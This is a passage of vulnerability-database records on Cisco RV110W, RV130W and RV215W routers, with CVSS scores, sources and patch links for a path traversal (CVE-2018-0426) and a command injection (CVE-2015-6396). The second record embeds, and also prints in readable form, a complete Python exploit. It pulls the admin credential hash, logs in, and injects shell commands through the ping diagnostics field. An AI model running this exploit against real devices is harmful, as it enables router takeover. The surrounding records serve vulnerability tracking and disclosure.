"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
}
]
},
"cve": "CVE-2018-0426",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-0426",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-18072",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-118628",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-0426",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-0426",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-0426",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-18072",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-262",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-118628",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "VULHUB",
"id": "VHN-118628"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to the targeted device. A successful exploit could allow the attacker to gain access to arbitrary files on the affected device, resulting in the disclosure of sensitive information. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-0426"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "VULHUB",
"id": "VHN-118628"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-0426",
"trust": 3.1
},
{
"db": "SECTRACK",
"id": "1041678",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-18072",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-118628",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "VULHUB",
"id": "VHN-118628"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"id": "VAR-201810-0304",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "VULHUB",
"id": "VHN-118628"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
}
]
},
"last_update_date": "2024-11-23T23:02:00.654000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20180905-rv-routers-traversal",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-traversal"
},
{
"title": "CiscoRV110W, RV130W, RV215W Directory Traversal Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/139765"
},
{
"title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84593"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-118628"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-traversal"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1041678"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0426"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-0426"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "VULHUB",
"id": "VHN-118628"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"db": "VULHUB",
"id": "VHN-118628"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"date": "2018-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-118628"
},
{
"date": "2018-12-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"date": "2018-09-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"date": "2018-10-05T14:29:01.170000",
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18072"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-118628"
},
{
"date": "2018-12-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010840"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-262"
},
{
"date": "2024-11-21T03:38:12.290000",
"db": "NVD",
"id": "CVE-2018-0426"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Path traversal vulnerability in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010840"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-262"
}
],
"trust": 0.6
}
}
var-201608-0273
Vulnerability from variot
The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. A local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. This issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. The following products are affected: RV110W Wireless-N VPN Firewall RV130W Wireless-N Multifunction VPN Router RV215W Wireless-N VPN Router. #!/usr/bin/env python2
Cisco RV110W Password Disclosure and OS Command Execute.
Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
Date: 2018-08
Exploit Author: RySh
Vendor Homepage: https://www.cisco.com/
Version: 1.1.0.9
Tested on: RV110W 1.1.0.9
CVE : CVE-2014-0683, CVE-2015-6396
import os import sys import re import urllib import urllib2 import getopt import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Usage: ./{script_name} 192.168.1.1 443 "reboot"
if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]
# Get session key, Just access index page.
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()
# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": admin_user,
"pwd": admin_pwd,
"sel_lang": "EN"
}
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"gui_action": "",
"traceroute_ip": "",
"commit": "1",
"ping_times": "3 |" + CMD + "|",
"ping_size": "64",
"wait_time": "4",
"ping_ip": "127.0.0.1",
"lookup_name": ""
}
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0273",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.1.7"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Adam Zielinski.",
"sources": [
{
"db": "BID",
"id": "92269"
}
],
"trust": 0.3
},
"cve": "CVE-2015-6396",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2015-6396",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-06162",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-84357",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2015-6396",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-6396",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-6396",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2016-06162",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201608-173",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-84357",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. \nA local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. \nThis issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. \nThe following products are affected:\nRV110W Wireless-N VPN Firewall\nRV130W Wireless-N Multifunction VPN Router\nRV215W Wireless-N VPN Router. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n IP = argv[1]\n PORT = argv[2]\n CMD = argv[3]\n \n # Get session key, Just access index page. \n url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n req = urllib2.Request(url)\n result = urllib2.urlopen(req)\n res = result.read()\n \n # parse \u0027admin_pwd\u0027! -- Get credits\n admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n # Get session_id by POST\n req2 = urllib2.Request(url + \"login.cgi\")\n req2.add_header(\u0027Origin\u0027, url)\n req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req2.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req2.add_header(\u0027Referer\u0027, url)\n req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data = {\"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": \"0\",\n \"change_action\": \"\",\n \"enc\": \"1\",\n \"user\": admin_user,\n \"pwd\": admin_pwd,\n \"sel_lang\": \"EN\"\n }\n r = urllib2.urlopen(req2, urllib.urlencode(data))\n resp = r.read()\n login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n # Execute your commands via diagnose command parameter, default command is `reboot`\n req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n req3.add_header(\u0027Origin\u0027, url)\n req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req3.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req3.add_header(\u0027Referer\u0027, url)\n req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data_cmd = {\"submit_button\": \"Diagnostics\",\n \"change_action\": \"gozila_cgi\",\n \"submit_type\": \"start_ping\",\n \"gui_action\": \"\",\n \"traceroute_ip\": \"\",\n \"commit\": \"1\",\n \"ping_times\": \"3 |\" + CMD + \"|\",\n \"ping_size\": \"64\",\n \"wait_time\": \"4\",\n \"ping_ip\": \"127.0.0.1\",\n \"lookup_name\": \"\"\n }\n r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6396"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "PACKETSTORM",
"id": "150781"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6396",
"trust": 3.5
},
{
"db": "BID",
"id": "92269",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "45986",
"trust": 1.1
},
{
